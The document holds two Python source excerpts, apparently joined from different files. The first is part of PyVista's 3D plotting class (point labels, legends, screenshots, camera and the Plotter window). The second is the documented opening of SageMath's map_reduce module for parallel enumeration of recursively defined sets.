labels : list or str
List of labels. Must be the same length as points. If a string name
is given with a pyvista.Common input for points, then these are fetched.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
font_size : float, optional
Sets the size of the title font. Defaults to 16.
text_color : string or 3 item list, optional
Color of text. Either a string, rgb list, or hex color string.
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
show_points : bool, optional
Controls if points are visible. Default True
point_color : string or 3 item list, optional. Color of points (if visible).
Either a string, rgb list, or hex color string. For example:
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
point_size : float, optional
Size of points (if visible)
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
shape_color : string or 3 item list, optional. Color of points (if visible).
Either a string, rgb list, or hex color string. For example:
shape : str, optional
The string name of the shape to use. Options are ``'rect'`` or
``'rounded_rect'``. If you want no shape, pass ``None``
fill_shape : bool, optional
Fill the shape with the ``shape_color``. Outlines if ``False``.
margin : int, optional
The size of the margin on the label background shape. Default is 3.
shape_opacity : flaot
The opacity of the shape between zero and one.
Returns
-------
labelMapper : vtk.vtkvtkLabeledDataMapper
VTK label mapper. Can be used to change properties of the labels.
"""
if font_family is None:
font_family = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if point_color is None and text_color is None and kwargs.get('color', None) is not None:
point_color = kwargs.get('color', None)
text_color = kwargs.get('color', None)
if point_color is None:
point_color = rcParams['color']
if text_color is None:
text_color = rcParams['font']['color']
if isinstance(points, (list, tuple)):
points = np.array(points)
if isinstance(points, np.ndarray):
vtkpoints = pyvista.PolyData(points) # Cast to poly data
elif is_pyvista_dataset(points):
vtkpoints = pyvista.PolyData(points.points)
if isinstance(labels, str):
labels = points.point_arrays[labels].astype(str)
else:
raise TypeError('Points type not useable: {}'.format(type(points)))
if len(vtkpoints.points) != len(labels):
raise Exception('There must be one label for each point')
vtklabels = vtk.vtkStringArray()
vtklabels.SetName('labels')
for item in labels:
vtklabels.InsertNextValue(str(item))
vtkpoints.GetPointData().AddArray(vtklabels)
# Create heirarchy
hier = vtk.vtkPointSetToLabelHierarchy()
hier.SetInputData(vtkpoints)
# hier.SetOrientationArrayName('orientation')
hier.SetLabelArrayName('labels')
# create label mapper
labelMapper = vtk.vtkLabelPlacementMapper()
labelMapper.SetInputConnection(hier.GetOutputPort())
if not isinstance(shape, str):
labelMapper.SetShapeToNone()
elif shape.lower() in 'rect':
labelMapper.SetShapeToRect()
elif shape.lower() in 'rounded_rect':
labelMapper.SetShapeToRoundedRect()
else:
raise RuntimeError('Shape ({}) not understood'.format(shape))
if fill_shape:
labelMapper.SetStyleToFilled()
else:
labelMapper.SetStyleToOutline()
labelMapper.SetBackgroundColor(parse_color(shape_color))
labelMapper.SetBackgroundOpacity(shape_opacity)
labelMapper.SetMargin(margin)
textprop = hier.GetTextProperty()
textprop.SetItalic(italic)
textprop.SetBold(bold)
textprop.SetFontSize(font_size)
textprop.SetFontFamily(parse_font_family(font_family))
textprop.SetColor(parse_color(text_color))
textprop.SetShadow(shadow)
self.remove_actor('{}-points'.format(name), reset_camera=False)
self.remove_actor('{}-labels'.format(name), reset_camera=False)
# add points
if show_points:
style = 'points'
else:
style = 'surface'
self.add_mesh(vtkpoints, style=style, color=point_color,
point_size=point_size, name='{}-points'.format(name),
pickable=pickable)
labelActor = vtk.vtkActor2D()
labelActor.SetMapper(labelMapper)
self.add_actor(labelActor, reset_camera=False,
name='{}-lables'.format(name), pickable=False)
return labelMapper
def add_point_scalar_labels(self, points, labels, fmt=None, preamble='', **kwargs):
"""Wrapper for :func:`pyvista.BasePlotter.add_point_labels` that will label
points from a dataset with their scalar values.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : str
String name of the point data array to use.
fmt : str
String formatter used to format numerical data
"""
if not is_pyvista_dataset(points):
raise TypeError('input points must be a pyvista dataset, not: {}'.format(type(points)))
if not isinstance(labels, str):
raise TypeError('labels must be a string name of the scalar array to use')
if fmt is None:
fmt = rcParams['font']['fmt']
if fmt is None:
fmt = '%.6e'
scalars = points.point_arrays[labels]
phrase = '{} {}'.format(preamble, '%.3e')
labels = [phrase % val for val in scalars]
return self.add_point_labels(points, labels, **kwargs)
def add_points(self, points, **kwargs):
""" Add points to a mesh """
kwargs['style'] = 'points'
self.add_mesh(points, **kwargs)
def add_arrows(self, cent, direction, mag=1, **kwargs):
""" Adds arrows to plotting object """
direction = direction.copy()
if cent.ndim != 2:
cent = cent.reshape((-1, 3))
if direction.ndim != 2:
direction = direction.reshape((-1, 3))
direction[:,0] *= mag
direction[:,1] *= mag
direction[:,2] *= mag
pdata = pyvista.vector_poly_data(cent, direction)
# Create arrow object
arrow = vtk.vtkArrowSource()
arrow.Update()
glyph3D = vtk.vtkGlyph3D()
glyph3D.SetSourceData(arrow.GetOutput())
glyph3D.SetInputData(pdata)
glyph3D.SetVectorModeToUseVector()
glyph3D.Update()
arrows = wrap(glyph3D.GetOutput())
return self.add_mesh(arrows, **kwargs)
@staticmethod
def _save_image(image, filename, return_img=None):
"""Internal helper for saving a NumPy image array"""
if not image.size:
raise Exception('Empty image. Have you run plot() first?')
# write screenshot to file
if isinstance(filename, str):
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
if not return_img:
return imageio.imwrite(filename, image)
imageio.imwrite(filename, image)
return image
def screenshot(self, filename=None, transparent_background=None,
return_img=None, window_size=None):
"""
Takes screenshot at current camera position
Parameters
----------
filename : str, optional
Location to write image to. If None, no image is written.
transparent_background : bool, optional
Makes the background transparent. Default False.
return_img : bool, optional
If a string filename is given and this is true, a NumPy array of
the image will be returned.
Returns
-------
img : numpy.ndarray
Array containing pixel RGB and alpha. Sized:
[Window height x Window width x 3] for transparent_background=False
[Window height x Window width x 4] for transparent_background=True
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(sphere)
>>> plotter.screenshot('screenshot.png') # doctest:+SKIP
"""
if window_size is not None:
self.window_size = window_size
# configure image filter
if transparent_background is None:
transparent_background = rcParams['transparent_background']
self.image_transparent_background = transparent_background
# This if statement allows you to save screenshots of closed plotters
# This is needed for the sphinx-gallery work
if not hasattr(self, 'ren_win'):
# If plotter has been closed...
# check if last_image exists
if hasattr(self, 'last_image'):
# Save last image
return self._save_image(self.last_image, filename, return_img)
# Plotter hasn't been rendered or was improperly closed
raise AttributeError('This plotter is unable to save a screenshot.')
if isinstance(self, Plotter):
# TODO: we need a consistent rendering function
self.render()
else:
self._render()
# debug: this needs to be called twice for some reason,
img = self.image
img = self.image
return self._save_image(img, filename, return_img)
def add_legend(self, labels=None, bcolor=(0.5, 0.5, 0.5), border=False,
size=None, name=None):
"""
Adds a legend to render window. Entries must be a list
containing one string and color entry for each item.
Parameters
----------
labels : list, optional
When set to None, uses existing labels as specified by
- add_mesh
- add_lines
- add_points
List contianing one entry for each item to be added to the
legend. Each entry must contain two strings, [label,
color], where label is the name of the item to add, and
color is the color of the label to add.
bcolor : list or string, optional
Background color, either a three item 0 to 1 RGB color
list, or a matplotlib color string (e.g. 'w' or 'white'
for a white color). If None, legend background is
disabled.
border : bool, optional
Controls if there will be a border around the legend.
Default False.
size : list, optional
Two float list, each float between 0 and 1. For example
[0.1, 0.1] would make the legend 10% the size of the
entire figure window.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Returns
-------
legend : vtk.vtkLegendBoxActor
Actor for the legend.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, label='My Mesh')
>>> _ = plotter.add_mesh(othermesh, 'k', label='My Other Mesh')
>>> _ = plotter.add_legend()
>>> plotter.show() # doctest:+SKIP
Alternative manual example
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> legend_entries = []
>>> legend_entries.append(['My Mesh', 'w'])
>>> legend_entries.append(['My Other Mesh', 'k'])
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.add_mesh(othermesh, 'k')
>>> _ = plotter.add_legend(legend_entries)
>>> plotter.show() # doctest:+SKIP
"""
self.legend = vtk.vtkLegendBoxActor()
if labels is None:
# use existing labels
if not self._labels:
raise Exception('No labels input.\n\n' +
'Add labels to individual items when adding them to' +
'the plotting object with the "label=" parameter. ' +
'or enter them as the "labels" parameter.')
self.legend.SetNumberOfEntries(len(self._labels))
for i, (vtk_object, text, color) in enumerate(self._labels):
self.legend.SetEntry(i, vtk_object, text, parse_color(color))
else:
self.legend.SetNumberOfEntries(len(labels))
legendface = pyvista.single_triangle()
for i, (text, color) in enumerate(labels):
self.legend.SetEntry(i, legendface, text, parse_color(color))
if size:
self.legend.SetPosition2(size[0], size[1])
if bcolor is None:
self.legend.UseBackgroundOff()
else:
self.legend.UseBackgroundOn()
self.legend.SetBackgroundColor(bcolor)
if border:
self.legend.BorderOn()
else:
self.legend.BorderOff()
# Add to renderer
self.add_actor(self.legend, reset_camera=False, name=name, pickable=False)
return self.legend
@property
def camera_position(self):
""" Returns camera position of the active render window """
return self.renderers[self._active_renderer_index].camera_position
@camera_position.setter
def camera_position(self, camera_location):
""" Set camera position of the active render window """
self.renderers[self._active_renderer_index].camera_position = camera_location
def reset_camera(self):
"""
Reset camera so it slides along the vector defined from camera
position to focal point until all of the actors can be seen.
"""
self.renderers[self._active_renderer_index].reset_camera()
self._render()
def isometric_view(self):
"""DEPRECATED: Please use ``view_isometric``"""
return self.view_isometric()
def view_isometric(self):
"""
Resets the camera to a default isometric view showing all the
actors in the scene.
"""
return self.renderer.view_isometric()
def view_vector(self, vector, viewup=None):
return self.renderer.view_vector(vector, viewup=viewup)
def view_xy(self, negative=False):
"""View the XY plane"""
return self.renderer.view_xy(negative=negative)
def view_xz(self, negative=False):
"""View the XZ plane"""
return self.renderer.view_xz(negative=negative)
def view_yz(self, negative=False):
"""View the YZ plane"""
return self.renderer.view_yz(negative=negative)
def disable(self):
"""Disable this renderer's camera from being interactive"""
return self.renderer.disable()
def enable(self):
"""Enable this renderer's camera to be interactive"""
return self.renderer.enable()
def set_background(self, color, loc='all'):
"""
Sets background color
Parameters
----------
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
loc : int, tuple, list, or str, optional
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If ``loc='all'`` then all
render windows will have their background set.
"""
if color is None:
color = rcParams['background']
if isinstance(color, str):
if color.lower() in 'paraview' or color.lower() in 'pv':
# Use the default ParaView background color
color = PV_BACKGROUND
else:
color = pyvista.string_to_rgb(color)
if loc =='all':
for renderer in self.renderers:
renderer.SetBackground(color)
else:
renderer = self.renderers[self.loc_to_index(loc)]
renderer.SetBackground(color)
@property
def background_color(self):
""" Returns background color of the first render window """
return self.renderers[0].GetBackground()
@background_color.setter
def background_color(self, color):
""" Sets the background color of all the render windows """
self.set_background(color)
def remove_legend(self):
""" Removes legend actor """
if hasattr(self, 'legend'):
self.remove_actor(self.legend, reset_camera=False)
self._render()
def generate_orbital_path(self, factor=3., n_points=20, viewup=None, shift=0.0):
"""Genrates an orbital path around the data scene
Parameters
----------
factor : float
A scaling factor when biulding the orbital extent
n_points : int
number of points on the orbital path
viewup : list(float)
the normal to the orbital plane
shift : float, optional
shift the plane up/down from the center of the scene by this amount
"""
if viewup is None:
viewup = rcParams['camera']['viewup']
center = np.array(self.center)
bnds = np.array(self.bounds)
radius = (bnds[1] - bnds[0]) * factor
y = (bnds[3] - bnds[2]) * factor
if y > radius:
radius = y
center += np.array(viewup) * shift
return pyvista.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points)
def fly_to(self, point):
"""Given a position point, move the current camera's focal point to that
point. The movement is animated over the number of frames specified in
NumberOfFlyFrames. The LOD desired frame rate is used.
"""
if not hasattr(self, 'iren'):
raise AttributeError('This plotter does not have an interactive window')
return self.iren.FlyTo(self.renderer, *point)
def orbit_on_path(self, path=None, focus=None, step=0.5, viewup=None,
bkg=True, write_frames=False):
"""Orbit on the given path focusing on the focus point
Parameters
----------
path : pyvista.PolyData
Path of orbital points. The order in the points is the order of
travel
focus : list(float) of length 3, optional
The point ot focus the camera.
step : float, optional
The timestep between flying to each camera position
viewup : list(float)
the normal to the orbital plane
write_frames : bool
Assume a file is open and write a frame on each camera view during
the orbit.
"""
if focus is None:
focus = self.center
if viewup is None:
viewup = rcParams['camera']['viewup']
if path is None:
path = self.generate_orbital_path(viewup=viewup)
if not is_pyvista_dataset(path):
path = pyvista.PolyData(path)
points = path.points
# Make sure the whole scene is visible
self.camera.SetThickness(path.length)
def orbit():
"""Internal thread for running the orbit"""
for point in points:
self.set_position(point)
self.set_focus(focus)
self.set_viewup(viewup)
if bkg:
time.sleep(step)
if write_frames:
self.write_frame()
if bkg and isinstance(self, pyvista.BackgroundPlotter):
thread = Thread(target=orbit)
thread.start()
else:
bkg = False
orbit()
return
def export_vtkjs(self, filename, compress_arrays=False):
"""
Export the current rendering scene as a VTKjs scene for
rendering in a web browser
"""
if not hasattr(self, 'ren_win'):
raise RuntimeError('Export must be called before showing/closing the scene.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
return export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays)
def __del__(self):
self.close()
self.deep_clean()
del self.renderers
class Plotter(BasePlotter):
""" Plotting object to display vtk meshes or numpy arrays.
Example
-------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> another_mesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, color='red')
>>> _ = plotter.add_mesh(another_mesh, color='blue')
>>> plotter.show() # doctest:+SKIP
Parameters
----------
off_screen : bool, optional
Renders off screen when False. Useful for automated screenshots.
notebook : bool, optional
When True, the resulting plot is placed inline a jupyter notebook.
Assumes a jupyter console is active. Automatically enables off_screen.
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one render
window.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
multi_samples : int
The number of multi-samples used to mitigate aliasing. 4 is a good
default but 8 will have better results with a potential impact on
perfromance.
line_smoothing : bool
If True, enable line smothing
point_smoothing : bool
If True, enable point smothing
polygon_smoothing : bool
If True, enable polygon smothing
"""
last_update_time = 0.0
q_pressed = False
right_timer_id = -1
def __init__(self, off_screen=None, notebook=None, shape=(1, 1),
border=None, border_color='k', border_width=2.0,
window_size=None, multi_samples=None, line_smoothing=False,
point_smoothing=False, polygon_smoothing=False):
"""
Initialize a vtk plotting object
"""
super(Plotter, self).__init__(shape=shape, border=border,
border_color=border_color,
border_width=border_width)
log.debug('Initializing')
def on_timer(iren, event_id):
""" Exit application if interactive renderer stops """
if event_id == 'TimerEvent':
self.iren.TerminateApp()
if off_screen is None:
off_screen = pyvista.OFF_SCREEN
if notebook is None:
notebook = scooby.in_ipykernel()
self.notebook = notebook
if self.notebook:
off_screen = True
self.off_screen = off_screen
if window_size is None:
window_size = rcParams['window_size']
if multi_samples is None:
multi_samples = rcParams['multi_samples']
# initialize render window
self.ren_win = vtk.vtkRenderWindow()
self.ren_win.SetMultiSamples(multi_samples)
self.ren_win.SetBorders(True)
if line_smoothing:
self.ren_win.LineSmoothingOn()
if point_smoothing:
self.ren_win.PointSmoothingOn()
if polygon_smoothing:
self.ren_win.PolygonSmoothingOn()
for renderer in self.renderers:
self.ren_win.AddRenderer(renderer)
if self.off_screen:
self.ren_win.SetOffScreenRendering(1)
else: # Allow user to interact
self.iren = vtk.vtkRenderWindowInteractor()
self.iren.LightFollowCameraOff()
self.iren.SetDesiredUpdateRate(30.0)
self.iren.SetRenderWindow(self.ren_win)
self.enable_trackball_style()
self.iren.AddObserver("KeyPressEvent", self.key_press_event)
self.update_style()
# for renderer in self.renderers:
# self.iren.SetRenderWindow(renderer)
# Set background
self.set_background(rcParams['background'])
# Set window size
self.window_size = window_size
# add timer event if interactive render exists
if hasattr(self, 'iren'):
self.iren.AddObserver(vtk.vtkCommand.TimerEvent, on_timer)
def show(self, title=None, window_size=None, interactive=True,
auto_close=None, interactive_update=False, full_screen=False,
screenshot=False, return_img=False, use_panel=None, cpos=None,
height=400):
"""
Creates plotting window
Parameters
----------
title : string, optional
Title of plotting window.
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
interactive : bool, optional
Enabled by default. Allows user to pan and move figure.
auto_close : bool, optional
Enabled by default. Exits plotting session when user
closes the window when interactive is True.
interactive_update: bool, optional
Disabled by default. Allows user to non-blocking draw,
user should call Update() in each iteration.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores
window_size. Default False.
use_panel : bool, optional
If False, the interactive rendering from panel will not be used in
notebooks
cpos : list(tuple(floats))
The camera position to use
height : int, optional
height for panel pane. Only used with panel.
Returns
-------
cpos : list
List of camera position, focal point, and view up
"""
if use_panel is None:
use_panel = rcParams['use_panel']
if auto_close is None:
auto_close = rcParams['auto_close']
# reset unless camera for the first render unless camera is set
if self._first_time: # and not self.camera_set:
for renderer in self.renderers:
if not renderer.camera_set and cpos is None:
renderer.camera_position = renderer.get_default_cam_pos()
renderer.ResetCamera()
elif cpos is not None:
renderer.camera_position = cpos
self._first_time = False
# if full_screen:
if full_screen:
self.ren_win.SetFullScreen(True)
self.ren_win.BordersOn() # super buggy when disabled
else:
if window_size is None:
window_size = self.window_size
self.ren_win.SetSize(window_size[0], window_size[1])
# Render
log.debug('Rendering')
self.ren_win.Render()
# This has to be after the first render for some reason
if title is None:
title = self.title
if title:
self.ren_win.SetWindowName(title)
self.title = title
# Keep track of image for sphinx-gallery
self.last_image = self.screenshot(screenshot, return_img=True)
disp = None
if interactive and (not self.off_screen):
try: # interrupts will be caught here
log.debug('Starting iren')
self.update_style()
self.iren.Initialize()
if not interactive_update:
self.iren.Start()
except KeyboardInterrupt:
log.debug('KeyboardInterrupt')
self.close()
raise KeyboardInterrupt
elif self.notebook and use_panel and not hasattr(self, 'volume'):
try:
from panel.pane import VTK as panel_display
disp = panel_display(self.ren_win, sizing_mode='stretch_width',
height=height)
except:
pass
# NOTE: after this point, nothing from the render window can be accessed
# as if a user presed the close button, then it destroys the
# the render view and a stream of errors will kill the Python
# kernel if code here tries to access that renderer.
# See issues #135 and #186 for insight before editing the
# remainder of this function.
# Get camera position before closing
cpos = self.camera_position
# NOTE: our conversion to panel currently does not support mult-view
# so we should display the static screenshot in notebooks for
# multi-view plots until we implement this feature
# If notebook is true and panel display failed:
if self.notebook and (disp is None or self.shape != (1,1)):
import PIL.Image
# sanity check
try:
import IPython
except ImportError:
raise Exception('Install IPython to display image in a notebook')
disp = IPython.display.display(PIL.Image.fromarray(self.last_image))
# Cleanup
if auto_close:
self.close()
# Return the notebook display: either panel object or image display
if self.notebook:
return disp
# If user asked for screenshot, return as numpy array after camera
# position
if return_img or screenshot == True:
return cpos, self.last_image
# default to returning last used camera position
return cpos
def plot(self, *args, **kwargs):
""" Present for backwards compatibility. Use `show()` instead """
logging.warning("`.plot()` is deprecated. Please use `.show()` instead.")
return self.show(*args, **kwargs)
def render(self):
""" renders main window """
self.ren_win.Render()
|
map_reduce.py
|
r"""
Parallel computations using RecursivelyEnumeratedSet and Map-Reduce
There exists an efficient way to distribute computations when you have a set
`S` of objects defined by :func:`RecursivelyEnumeratedSet` (see
:mod:`sage.sets.recursively_enumerated_set` for more details) over which you
would like to perform the following kind of operations :
* Compute the cardinality of a (very large) set defined recursively (through a
call to
:class:`RecursivelyEnumeratedSet of forest type<sage.combinat.backtrack.SearchForest>`)
* More generally, compute any kind of generating series over this set
* Test a conjecture : i.e. find an element of `S` satisfying a specific
property; conversely, check that all of them do
* Count/list the elements of `S` having a specific property
* Apply any map/reduce kind of operation over the elements of `S`
AUTHORS :
- Florent Hivert -- code, documentation (2012-2016)
- Jean Baptiste Priez -- prototype, debugging help on MacOSX (2011-June, 2016)
- Nathann Cohen -- Some doc (2012)
Contents
--------
- :ref:`basic-usage`
- :ref:`advanced-use`
- :ref:`profiling`
- :ref:`logging`
- :ref:`protocol-description`
- :ref:`examples`
How is this different from usual MapReduce ?
--------------------------------------------
This implementation is specific to
:class:`RecursivelyEnumeratedSet of forest type<sage.combinat.backtrack.SearchForest>`,
and uses its properties to do its job. Not only mapping
and reducing is done on different processors but also **generating the elements
of** `S`.
.. _basic-usage:
How can I use all that stuff?
-----------------------------
First, you need the information necessary to describe a
:class:`RecursivelyEnumeratedSet of forest
type<sage.combinat.backtrack.SearchForest>` representing your set `S` (see
:mod:`sage.sets.recursively_enumerated_set`). Then, you need to provide a Map
function as well as a Reduce function. Here are some examples :
* **Counting the number of elements**: In this situation, the map function
can be set to ``lambda x : 1``, and the reduce function just adds the
values together, i.e. ``lambda x,y : x+y``.
Here's the Sage code for binary words of length `\leq 16` ::
sage: seeds = [[]]
sage: succ = lambda l: [l+[0], l+[1]] if len(l) <= 15 else []
sage: S = RecursivelyEnumeratedSet(seeds, succ,
....: structure='forest', enumeration='depth')
sage: map_function = lambda x: 1
sage: reduce_function = lambda x,y: x+y
sage: reduce_init = 0
sage: S.map_reduce(map_function, reduce_function, reduce_init)
131071
One can check that this is indeed the number of binary words of
length `\leq 16` ::
sage: factor(131071 + 1)
2^17
Note that the function mapped and reduced here are equivalent to the default
values of the :meth:`sage.combinat.backtrack.SearchForest.map_reduce` method
so that to compute the number of element you only need to call::
sage: S.map_reduce()
131071
You don't need to use :func:`RecursivelyEnumeratedSet`, you can use directly
:class:`RESetMapReduce`. This is needed if you want to have fine
control over the parallel execution (see :ref:`advanced-use` below)::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots = [[]],
....: children = lambda l: [l+[0], l+[1]] if len(l) <= 15 else [],
....: map_function = lambda x : 1,
....: reduce_function = lambda x,y: x+y,
....: reduce_init = 0 )
sage: S.run()
131071
* **Generating series**: In this situation, the map function associates a
monomial to each element of `S`, while the Reduce function is still equal to
``lambda x,y : x+y``.
Here's the Sage code for binary words of length `\leq 16` ::
sage: S = RecursivelyEnumeratedSet(
....: [[]], lambda l: [l+[0], l+[1]] if len(l) < 16 else [],
....: structure='forest', enumeration='depth')
sage: sp = S.map_reduce(
....: map_function = lambda z: x**len(z),
....: reduce_function = lambda x,y: x+y,
....: reduce_init = 0 )
sage: sp
65536*x^16 + 32768*x^15 + 16384*x^14 + 8192*x^13 + 4096*x^12 + 2048*x^11 + 1024*x^10 + 512*x^9 + 256*x^8 + 128*x^7 + 64*x^6 + 32*x^5 + 16*x^4 + 8*x^3 + 4*x^2 + 2*x + 1
This is of course `\sum_{i=0}^{i=16} (2x)^i`::
sage: bool(sp == sum((2*x)^i for i in range(17)))
True
Here is another example where we count permutations of size `\leq 8` (here
we use the default values)::
sage: S = RecursivelyEnumeratedSet( [[]],
....: lambda l: ([l[:i] + [len(l)] + l[i:] for i in range(len(l)+1)]
....: if len(l) < 8 else []),
....: structure='forest', enumeration='depth')
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
This is of course `\sum_{i=0}^{i=8} i! x^i`::
sage: bool(sp == sum(factorial(i)*x^i for i in range(9)))
True
* **Post Processing**: We now demonstrate the use of ``post_process``. We
generate the permutation as previously, but we only perform the map/reduce
computation on those of even ``len``. Of course we get the even part of the
previous generating series::
sage: S = RecursivelyEnumeratedSet( [[]],
....: lambda l: ([l[:i] + [len(l)+1] + l[i:] for i in range(len(l)+1)]
....: if len(l) < 8 else []),
....: post_process = lambda l : l if len(l) % 2 == 0 else None,
....: structure='forest', enumeration='depth')
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 720*x^6 + 24*x^4 + 2*x^2 + 1
This is also useful for example to call a constructor on the generated
elements::
sage: S = RecursivelyEnumeratedSet( [[]],
....: lambda l: ([l[:i] + [len(l)+1] + l[i:] for i in range(len(l)+1)]
....: if len(l) < 5 else []),
....: post_process = lambda l : Permutation(l) if len(l) == 5 else None,
....: structure='forest', enumeration='depth')
sage: sp = S.map_reduce(lambda z: x**(len(z.inversions()))); sp
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
We get here a polynomial called the `x`-factorial of `5` that is
`\prod_{i=1}^{i=5} \frac{1-x^i}{1-x}`::
sage: (prod((1-x^i)/(1-x) for i in range(1,6))).simplify_rational()
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
* **Listing the objects**: One can also compute the list of objects in a
:class:`RecursivelyEnumeratedSet of forest type<sage.combinat.backtrack.SearchForest>`
using :class:`RESetMapReduce`. As an example, we compute the set of numbers
between 1 and 63, generated by their binary expansion::
sage: S = RecursivelyEnumeratedSet( [1],
....: lambda l: [(l<<1)|0, (l<<1)|1] if l < 1<<5 else [],
....: structure='forest', enumeration='depth')
Here is the list computed without :class:`RESetMapReduce`::
sage: serial = list(S)
sage: serial
[1, 2, 4, 8, 16, 32, 33, 17, 34, 35, 9, 18, 36, 37, 19, 38, 39, 5, 10, 20, 40, 41, 21, 42, 43, 11, 22, 44, 45, 23, 46, 47, 3, 6, 12, 24, 48, 49, 25, 50, 51, 13, 26, 52, 53, 27, 54, 55, 7, 14, 28, 56, 57, 29, 58, 59, 15, 30, 60, 61, 31, 62, 63]
Here is how to perform the parallel computation. The order of the lists
depends on the synchronisation of the various computation processes and
therefore should be considered as random::
sage: parall = S.map_reduce( lambda x: [x], lambda x,y: x+y, [] )
sage: parall # random
[1, 3, 7, 15, 31, 63, 62, 30, 61, 60, 14, 29, 59, 58, 28, 57, 56, 6, 13, 27, 55, 54, 26, 53, 52, 12, 25, 51, 50, 24, 49, 48, 2, 5, 11, 23, 47, 46, 22, 45, 44, 10, 21, 43, 42, 20, 41, 40, 4, 9, 19, 39, 38, 18, 37, 36, 8, 17, 35, 34, 16, 33, 32]
sage: sorted(serial) == sorted(parall)
True
.. _advanced-use:
Advanced use
------------
Fine control of the execution of a map/reduce computations is obtained by
passing parameters to the :meth:`RESetMapReduce.run` method. One can use the
three following parameters:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``reduce_locally`` -- whether the workers should reduce locally
their work or sends results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
Here is an example or how to deal with timeout::
sage: from sage.parallel.map_reduce import RESetMPExample, AbortError
sage: EX = RESetMPExample(maxl = 100)
sage: try:
....: res = EX.run(timeout=0.01)
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: EX = RESetMPExample(maxl = 8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
As for ``reduce_locally``, one should not see any difference, except for speed
during normal usage. Most of the time the user should leave it to ``True``,
unless he sets up a mechanism to consume the partial results as soon as they
arrive. See :class:`RESetParallelIterator` and in particular the ``__iter__``
method for a example of consumer use.
.. _profiling:
Profiling
---------
It is possible the profile a map/reduce computation. First we create a
:class:`RESetMapReduce` object::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots = [[]],
....: children = lambda l: [l+[0], l+[1]] if len(l) <= 15 else [],
....: map_function = lambda x : 1,
....: reduce_function = lambda x,y: x+y,
....: reduce_init = 0 )
The profiling is activated by the ``profile`` parameter. The value provided
should be a prefix (including a possible directory) for the profile dump::
sage: prof = tmp_dir('RESetMR_profile')+'profcomp'
sage: res = S.run(profile=prof) # random
[RESetMapReduceWorker-1:58] (20:00:41.444) Profiling in /home/user/.sage/temp/mymachine.mysite/32414/RESetMR_profilewRCRAx/profcomp1 ...
...
[RESetMapReduceWorker-1:57] (20:00:41.444) Profiling in /home/user/.sage/temp/mymachine.mysite/32414/RESetMR_profilewRCRAx/profcomp0 ...
sage: res
131071
In this example, the profile have been dumped in files such as
``profcomp0``. One can then load and print them as follows. See
:class:`profile.profile` for more details::
sage: import cProfile, pstats
sage: st = pstats.Stats(prof+'0')
sage: st.strip_dirs().sort_stats('cumulative').print_stats() #random
...
Ordered by: cumulative time
ncalls tottime percall cumtime percall filename:lineno(function)
1 0.023 0.023 0.432 0.432 map_reduce.py:1211(run_myself)
11968 0.151 0.000 0.223 0.000 map_reduce.py:1292(walk_branch_locally)
...
